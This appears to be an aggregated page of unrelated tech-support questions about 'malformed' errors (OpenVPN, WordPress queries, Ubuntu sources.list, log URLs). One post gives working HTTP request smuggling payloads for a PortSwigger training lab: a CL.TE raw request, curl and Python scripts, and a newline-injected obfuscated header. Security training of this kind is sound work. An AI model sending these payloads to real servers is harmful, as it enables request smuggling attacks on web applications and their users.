Malformed packets for OpenVPN

I have setup OpenVPN on pfsense 2.4.5, and captured sample data for my OpenVPN traffic. However, I observed that most of packets captures for OpenVPN is malformed.

What are the possible reasons? Below is a screenshot of the capture for reference. Any suggestion is helpful!

Thanks! Openvpn Sample Capture

Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1 Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 10 Transfer-Encoding: chunked  0  G  

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $  'POST' \     -H $  'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $  'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $  'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $  'Accept-Language: en-US,en;q=0.5' -H $  'Accept-Encoding: gzip, deflate' -H $  'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $  'Connection: close' -H $  'Upgrade-Insecure-Requests: 1' -H $  'Content-Length: 8' \     --data-binary $  '0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \     $  'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/' 

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():     url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'     headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',     'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}      data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'      s = requests.Session()     r = requests.Request('POST', url, headers=headers, data=data)     prepared = r.prepare()     response = s.send(prepared)      print(response.request.headers)     print(response.status_code)     print(response.text) 

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python  import pycurl from StringIO import StringIO  buffer = StringIO() c = pycurl.Curl() c.setopt(c.POST, 1) c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/') c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a') #c.setopt(pycurl.POSTFIELDSIZE, 8) c.setopt(c.HTTPHEADER, [     'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',     'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',     'Content-Length: 8',     'Transfer-Encoding: chunked',     'Content-Type: application/x-www-form-urlencoded'     ]) #c.setopt(c.CRLF, 1) c.setopt(c.VERBOSE, 1) c.setopt(c.HEADER, 1) c.setopt(c.WRITEDATA, buffer) c.perform() c.close()  body = buffer.getvalue()  print(body) 

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying 18.200.141.238:443...                                                                                                                             * TCP_NODELAY set                                                                                                                                            * Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                      * found 387 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 *        server certificate verification OK *        server certificate status verification SKIPPED *        common name: web-security-academy.net (matched) *        server certificate expiration date OK *        server certificate activation date OK *        certificate public key: RSA *        certificate version: #3 *        subject: CN=web-security-academy.net *        start date: Fri, 05 Jul 2019 00:00:00 GMT *        expire date: Wed, 05 Aug 2020 12:00:00 GMT *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon * ALPN, server did not agree to a protocol > POST / HTTP/1.1 Host: ac561fd21ed819768081009200f2002e.web-security-academy.net Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0  Content-Length: 8 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded  8 * upload completely sent off: 15 out of 8 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 Internal Server Error < Content-Type: application/json; charset=utf-8 < Connection: close < Content-Length: 23 <  * Closing connection 0 HTTP/1.1 500 Internal Server Error Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 23  "Internal Server Error" 

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

Why does using WP_Query inside a shortcode in an elementor page cause the arguments for WP_Query to get malformed?

I am trying to embed a custom WP_Query inside a shortcode I have activated on one of my pages (created in Elementor). I have a Custom Post Type called ‘inspector-profiles’, and for some reason when I add that to my $ args array, it gets either not honored by WP, or it is overwritten by something else.

I cannot see what is causing an overwrite if anything.

The code is this, so far:

private function isInspector() {     if (is_user_logged_in()) {         $  user = wp_get_current_user();         return in_array('general_inspector', (array)$  user->roles);     }     return false; }  public function sc_inspectorProfileData() {     global $  wpdb;     $  user = \wp_get_current_user();       // WP_Query arguments     $  args = array(         'post_type'              => 'inspector-profiles',         'post_status'            => 'publish',         'author'                 => $  user->ID     );       // The Query     echo '<pre>';      $  myq = new \WP_Query( $  args );      print_r($  myq->request);      if ($  myq->have_posts()) {         while ($  myq->have_posts()) {             $  myq->the_post();             print_r($  myq->post);             wp_reset_postdata();             wp_reset_query();         }     }      echo '</pre>'; } 

When I create the arguments for WP_Query above, the $ args array looks fine prior to running the query. When I run the query, I immediately spit out the generated SQL query, and it looks like this:

SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND wp_posts.post_author IN (1) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'memberpressproduct', 'memberpressgroup', 'mpdl-file', 'ht_kb') AND ((wp_posts.post_status = 'publish')) ORDER BY wp_posts.post_date DESC LIMIT 0, 200

My specified post_type is not even in that list. What am I doing wrong? I have tried using instances of get_posts(), using the WP_Query object, and some stuff that has been deprecated even.

Not able to install skype. E: Malformed entry 53 in list file

Not able to install skype. I’m opening terminal and writing sudo apt-get install skype but terminal says: E: Malformed entry 53 in list file /etc/apt/sources.list (Component) E: The list of sources … could not be read. E: Malformed entry 53 in list file /etc/apt/sources.list (Component) E: The list of sources could not be read. Can anyone help me on this, ubuntu version

Sources.list dilemma in ubuntu 18.04 (Malformed entry 57)

I’d like to begin by stating that I am a new user and would like to ask that you all go easy on me. I’ve read other post with this problem, except my issue is slightly different and the solutions offered didn’t effectuate a solution in my case, so here it is…

When I attempt to input sudo apt-get update, I encounter the following error message…

E: Malformed entry 57 in list file /etc/apt/sources.list(Component) E: The list of sources could not be read.  

After reading the responses to similar issues, I tried sudo -H gedit /etc/apt/sources.list

and that command opened up my sources list:

# deb http :// us.archive.ubuntu.com/ubuntu/bionic main restricted # deb http : //us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted # deb http ://security.ubuntu.com/ubuntu bionic-security main restricted # See http ://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http ://us.archive.ubuntu.com/ubuntu/ bionic main restricted deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic universe main restricted multiverse ## Major bug fix updates produced after the final release of the ## distribution. deb http ://us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic-updates universe main restricted multiverse ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb http ://us.archive.ubuntu.com/ubuntu/ bionic universe # deb-src http://us.archive.ubuntu.com/ubuntu/ bionic universe deb http ://us.archive.ubuntu.com/ubuntu/ bionic-updates universe # deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic-updates universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu  ## team, and may not be under a free licence. Please satisfy yourself as to  ## your rights to use the software. Also, please note that software in  ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http ://us.archive.ubuntu.com/ubuntu/ bionic multiverse # deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic multiverse deb http ://us.archive.ubuntu.com/ubuntu/ bionic-updates multiverse # deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic-updates multiverse ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http ://us.archive.ubuntu.com/ubuntu/ bionic-backports main restricted universe multiverse deb-src http ://us.archive.ubuntu.com/ubuntu/ bionic-backports main restricted universe multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. deb http ://archive.canonical.com/ubuntu bionic partner deb-src http ://archive.canonical.com/ubuntu bionic partner deb http ://security.ubuntu.com/ubuntu bionic-security main restricted deb-src http ://security.ubuntu.com/ubuntu bionic-security universe main restricted multiverse deb http ://security.ubuntu.com/ubuntu bionic-security universe # deb-src http ://security.ubuntu.com/ubuntu bionic-security universe deb http ://security.ubuntu.com/ubuntu bionic-security multiverse # deb-src http ://security.ubuntu.com/ubuntu bionic-security multiverse deb https ://dl.winehq.org/wine-builds/ubuntu/ bionic main # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ bionic main deb https ://dl.winehq.org/wine-builds/ubuntu/ cosmicmain # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ cosmicmain # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ cosmicmain deb https ://dl.winehq.org/wine-builds/ubuntu/ bionicmain # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ bionicmain deb https ://dl.winehq.org/wine-builds/ubuntu/ xenialmain # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ xenialmain deb https ://dl.winehq.org/wine-builds/ubuntu/ trustymain # deb-src https ://dl.winehq.org/wine-builds/ubuntu/ trustymain 

I read that running commands that remove lines from your sources list can wreck your list file entirely, so I am hesitant to do that and I do not know how to uncomment a line.

Also, in order to circumvent the 8 link limitation imposed on members with less that 10 reputation points. I was forced to add spaces in the links of my sources list to avoid it being registered as a link, in order to be able to post this question. So please ignore the extra spaces that will be represented as an underscore in the following example…

Ex: http_://us.archive.ubunt….etc etc.

Can anyone please assist, Thanks.

how to fix a malformed entry 3 in list file /etc/apt/sources.list?

I have noticed that there are many malformed issues, but from what I can tell each malformed issue has different ways of being fixed. I can’t use gedit command. For some reason none of my commands work at all, and this keeps on popping up,

E: Malformed entry 3 in list file /etc/apt/sources.list.d/additional-repositories.list (Component) E: The list of sources could not be read.

What can I do to fix this, because I want to be able to use my OS witout any issues.

Malformed entry 61 in list file

I use Ubuntu 18.04 and I literally woke up to this. How come these problems always happen so suddenly? The problem is not such that it makes my computer unusable for various things, making videos/playing games/general internet use/etc but down the road? who knows what kind of trouble it could cause? the error reads E: Malformed entry 61 in list file /etc/apt/sources.list (URI parse)E: The list of sources could not be read. How do I solve this problem?

malformed URL in the logs

I have come across, malformed URL in the logs: 
It was part of a tier project. I wonder if it is related to URLs found in the verified URL file. if I double click one of them i get:
http//thedomain.com 
It fails because “:” is missing between http and //

UPDATE:
I checked in the verified URL lists. I didn’t find any issues. I think it is not related to GSA SER but I can’t delete this question.
SORRY